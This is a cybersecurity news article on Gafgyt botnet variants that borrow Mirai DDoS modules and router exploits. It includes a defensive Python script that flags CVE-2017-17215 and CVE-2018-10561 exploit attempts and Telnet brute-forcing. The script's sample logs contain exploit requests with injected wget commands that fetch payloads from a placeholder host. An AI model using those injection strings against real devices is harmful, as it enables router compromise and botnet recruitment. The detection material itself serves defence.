IoT Botnet Gafgyt Inherits DDoS Features From Mirai

Several new variants of the Linux-based Gafgyt botnet incorporate features of the infamous Mirai botnet, Uptycs researchers have found. The IoT-targeting botnet now carries new exploits for the initial compromise of Huawei, Realtek, and Dasan GPON routers.

Gafgyt, also known as Bashlite, was first uncovered in 2014 and targets vulnerable internet of things (IoT) devices from well-known manufacturers such as Huawei, Realtek, and ASUS. Once a device is compromised, the botnet uses it to launch large-scale distributed denial-of-service (DDoS) attacks. By exploiting well-known vulnerabilities such as CVE-2017-17215 (the Huawei HG532 exploit) and CVE-2018-10561 (the Dasan GPON authentication bypass), along with a Realtek exploit, it can drop next-stage payloads on compromised devices.

In research released Thursday, Uptycs researchers describe the latest Gafgyt variants, which incorporate several Mirai-based modules and also use new exploits.

The capabilities inherited from Mirai include several methods for carrying out DDoS attacks, among them HTTP flooding, UDP flooding, several TCP flood variants, and an STD flood module.

In addition, Gafgyt employs new approaches for the initial compromise of IoT devices, which it then turns into bots that perform DDoS attacks against specifically targeted IP addresses. These include a Mirai-inherited module for brute-forcing Telnet logins and exploits for vulnerabilities in Huawei, Realtek, and GPON devices.

Once the Huawei or Realtek exploit succeeds, the attackers use it to fetch additional payloads from servers they control:

“The IP addresses used for fetching the payloads were generally the open directories where malicious payloads for different architectures were hosted by the attacker,” researchers added.
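As an added example (not code from Uptycs or from this article), the following Python script shows what a defender can look for on the network side of the two initial-compromise paths described above: the CVE-2017-17215 and CVE-2018-10561 exploit requests, with the payload-hosting URL pulled out of the injected command so the attacker's open directory can be identified, and Telnet credential brute-forcing from a single source. The log formats, IP addresses and URLs are constructed for the example; the rules encode the public request patterns of those two CVEs (the Huawei UPnP /ctrlt/DeviceUpgrade_1 action with a shell substitution in its body, and the GPON "?images/" authentication bypass).

```python
"""Flag Gafgyt/Mirai-style initial-compromise attempts in router logs.

Added example; not Uptycs' or CyberIntelMag's code. Every log line, IP and
URL below is constructed for illustration.
"""
import re
from collections import Counter

# Constructed HTTP request log from a router's management interfaces.
# Hypothetical format: src_ip dst_port method path body_excerpt ('-' if none).
HTTP_LOG = """\
203.0.113.5 37215 POST /ctrlt/DeviceUpgrade_1 <NewStatusURL>$(/bin/busybox wget http://192.0.2.9/bins/mips -O /tmp/x)</NewStatusURL>
203.0.113.6 8080 GET /GponForm/diag_Form?images/ XWebPageName=diag&diag_action=ping&dest_host=`wget http://192.0.2.9/bins/arm`
198.51.100.2 80 GET /index.html -
198.51.100.2 80 GET /images/logo.png -
203.0.113.5 8080 GET /menu.html?images/ -
"""

# Constructed Telnet authentication log. Hypothetical format: src_ip user result.
TELNET_LOG = """\
203.0.113.7 root FAIL
203.0.113.7 admin FAIL
203.0.113.7 root FAIL
203.0.113.7 support FAIL
198.51.100.3 admin FAIL
198.51.100.3 admin OK
"""

# (rule name, pattern the request path must match, pattern the body must match or None)
HTTP_RULES = [
    # CVE-2017-17215: Huawei HG532 UPnP "DeviceUpgrade_1" action (TCP 37215); the
    # exploit smuggles a shell command into NewStatusURL/NewDownloadURL via $(...) or backticks.
    ("CVE-2017-17215 Huawei DeviceUpgrade_1 command injection",
     re.compile(r"/ctrlt/DeviceUpgrade_1"), re.compile(r"\$\(|`")),
    # CVE-2018-10561: Dasan GPON authentication bypass by appending "?images/" to the
    # requested path. Matching the query-string form only keeps ordinary /images/ assets quiet.
    ("CVE-2018-10561 GPON auth bypass",
     re.compile(r"\?images/"), None),
]

# First URL inside an injected command: where the bot fetches its next stage from.
URL_RE = re.compile(r"https?://[^\s`<>)]+")


def classify_http(line):
    """Return (src_ip, [matched rule names], first URL in the body or None)."""
    src, _port, _method, path, body = line.split(" ", 4)
    hits = [name for name, path_re, body_re in HTTP_RULES
            if path_re.search(path) and (body_re is None or body_re.search(body))]
    url = URL_RE.search(body)
    return src, hits, (url.group(0) if url else None)


def scan_http(log):
    """List (src_ip, rule, payload_url) for every rule hit in the log."""
    findings = []
    for line in log.splitlines():
        if not line.strip():
            continue
        src, hits, url = classify_http(line)
        findings.extend((src, rule, url) for rule in hits)
    return findings


def payload_hosts(findings):
    """Distinct hosts the injected commands download from: candidate open directories."""
    return sorted({re.sub(r"^https?://([^/]+).*$", r"\1", url)
                   for _src, _rule, url in findings if url})


def telnet_bruteforcers(log, threshold=3):
    """Sources with at least `threshold` failed Telnet logins (Mirai-style credential sweep)."""
    fails = Counter()
    for line in log.splitlines():
        if not line.strip():
            continue
        src, _user, result = line.split()
        if result == "FAIL":
            fails[src] += 1
    return {src: n for src, n in fails.items() if n >= threshold}


if __name__ == "__main__":
    for finding in scan_http(HTTP_LOG):
        print("exploit attempt:", finding)
    print("payload hosts:", payload_hosts(scan_http(HTTP_LOG)))
    print("telnet brute-forcers:", telnet_bruteforcers(TELNET_LOG))
```

Two details matter in practice. The GPON rule matches "?images/" rather than any "images/" substring, so a legitimate request for /images/logo.png is not flagged while the bypass form is, whatever page it is appended to. The hosts returned by payload_hosts are the servers the injected wget points at; those are the "open directories" the researchers mention, and they are the first thing to block and to pivot on when hunting for the architecture-specific binaries they serve.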

In an earlier variant seen in early March, researchers observed the Gafgyt family using the Tor network to hide its activity.

“Malware authors may not always innovate, and researchers often discover that malware authors copy and re-use leaked malware source code,” Uptycs researchers concluded.

About the author

CIM Team

CyberIntelMag is the trusted authority in cybersecurity, comprised of leading industry experts for over 20 years, dedicated to serving cybersecurity professionals. Our goal is to provide a one-stop shop for knowledge and insight needed to navigate throughout today’s emerging cybersecurity landscape through in-depth coverage of breaking news, tutorials, product reviews, videos and industry influencers.